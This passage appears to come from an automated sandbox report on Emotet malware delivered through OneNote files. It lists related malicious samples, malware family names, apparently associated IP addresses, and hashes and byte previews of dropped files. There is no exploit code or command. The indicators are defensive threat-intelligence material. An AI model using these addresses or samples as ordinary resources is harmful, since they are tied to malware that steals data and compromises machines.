                                                                                                                                                        Insight_Medical_Publishing_2.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                          Insight_Medical_Publishing_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                            Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                              Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                  Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                    Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                      OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                        OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          bbvoyage.comclick.wsfGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          Form - 16 Mar, 2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          penshorn.orgclick.wsfGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Form - 16 Mar, 2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          MBQ24253060297767042_202303161424.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          iMedPub_LTD_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          iMedPub_LTD_6.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          INNOVINC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Insight_Medical_Publishing_2.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Insight_Medical_Publishing_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          RACKCORP-APRackCorpAUclick.wsfGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          f_00321b.dllGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          f_00321b.dllGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          f_00321b.dllGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          aOHLlvfakv.dllGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          aOHLlvfakv.dllGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Form - 16 Mar, 2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          MBQ24253060297767042_202303161424.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          iMedPub_LTD_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          iMedPub_LTD_6.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          INNOVINC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Insight_Medical_Publishing_2.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Insight_Medical_Publishing_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 110.232.117.186
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          ce5f3254611a8c095a3d821d44539877file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          OYm3R777Yb.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, Raccoon Stealer v2, RedLine, SmokeLoaderBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          r7icIGgp7u.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          setup.exeGet hashmaliciousAmadey, Babuk, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          setup.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, RedLine, SmokeLoader, VidarBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          setup.exeGet hashmaliciousAmadey, Djvu, SmokeLoaderBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          tvfratt.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          sj6SYjQHo0.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, RHADAMANTHYS, SmokeLoaderBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          2QF0HzvFfv.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          yxaLgUlkeX.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          CBEbFPwWhr.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoaderBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          5MhlzHzGj7.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoaderBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          TLmyx807U1.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoaderBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          file.exeGet hashmaliciousFabookieBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          file.exeGet hashmaliciousFabookieBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          Form - 16 Mar, 2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoaderBrowse
                                                                                                                                                                          • 31.31.196.172
                                                                                                                                                                          • 186.202.153.5
                                                                                                                                                                          • 203.26.41.131
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dllclick.wsfGet hashmaliciousEmotetBrowse
                                                                                                                                                                            Form - 16 Mar, 2023.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                              MBQ24253060297767042_202303161424.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                iMedPub_LTD_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                  iMedPub_LTD_6.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                    INNOVINC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                      Insight_Medical_Publishing_2.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                        Insight_Medical_Publishing_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                          Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                            Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                              OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                  Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                    OMICS.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                      OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                        OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                          OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                            Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                              opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                                Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):62582
                                                                                                                                                                                                                  Entropy (8bit):7.996063107774368
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
                                                                                                                                                                                                                  MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
                                                                                                                                                                                                                  SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
                                                                                                                                                                                                                  SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
                                                                                                                                                                                                                  SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                  Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.
                                                                                                                                                                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                  Entropy (8bit):3.1209080103322826
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:kKw1Wry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:SGCvkPlE99SNxAhUext
                                                                                                                                                                                                                  MD5:0C80F3D6D15389C1B88AE87AE616E9AA
                                                                                                                                                                                                                  SHA1:19F703059C3AAB1B7F424F9E2EDEA05DD1F91DDF
                                                                                                                                                                                                                  SHA-256:6FF6FC2CED2B2C37AC59C4C013B745511E0589F15950C7727A5A99015061892C
                                                                                                                                                                                                                  SHA-512:E62AE9312F1E7A166E9F4A13CA9C7354F53407ED453FEF8A4CA452ECAD91A269D47E83DACF757AD13845DD40237424E64BAC95E5150BA7059775CAA3466413AE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:p...... ........{o...[..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):154907
                                                                                                                                                                                                                  Entropy (8bit):5.352007370471488
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:Z+C76gfYBIB9guw6LQ9DQl+zQxik4F77nXmvidlXRpE6Lhz67:IcQ9DQl+zrXgb
                                                                                                                                                                                                                  MD5:66690D9D0AB1A42D86705FDCEB6B43C0
                                                                                                                                                                                                                  SHA1:F86653F6E0D2DD13638F5EA78CD9DACFA7AD59FC
                                                                                                                                                                                                                  SHA-256:F14EE0812F28B1F799D5BAA55EBDC7834A52D2B4C611C26FF9C4DDA71F07F8C2
                                                                                                                                                                                                                  SHA-512:DE6A396CA85E9BC2B04B1F9CB00788EC160C6DC16AE166D705433F165FB43A9B04183202CCAA4E320323EB8600ED7B10398C5587ECA32645BE364B2BC2B1929E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-03-20T10:40:41">.. Build: 16.0.16310.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:Matlab v4 mat-file (little endian) x, numeric, rows 262223750, columns 0
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                  Entropy (8bit):2.3347765773363713
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:ulXElL9lCtClSzAaRtl:KAHum+A8X
                                                                                                                                                                                                                  MD5:A3BEA6374346095B3D983C54B405B3F5
                                                                                                                                                                                                                  SHA1:377FBAF591F68199F9007EB70B538D7A5F2BD52A
                                                                                                                                                                                                                  SHA-256:4935B0DA2E844A5C90182758E745B78A09D1F98A87292F67E365D03A32FC5297
                                                                                                                                                                                                                  SHA-512:19CEB88B10876149C26B46E3B8EED0AFBF1CE51A7B26C186BAD4FAD111FBD03B0508B2C668B1F0AF9ADDF52F72032F0A8EEBB7AEBD8F2A5B11044D473E831A3F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.....7..........T...x.......................6..........@....x...........
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
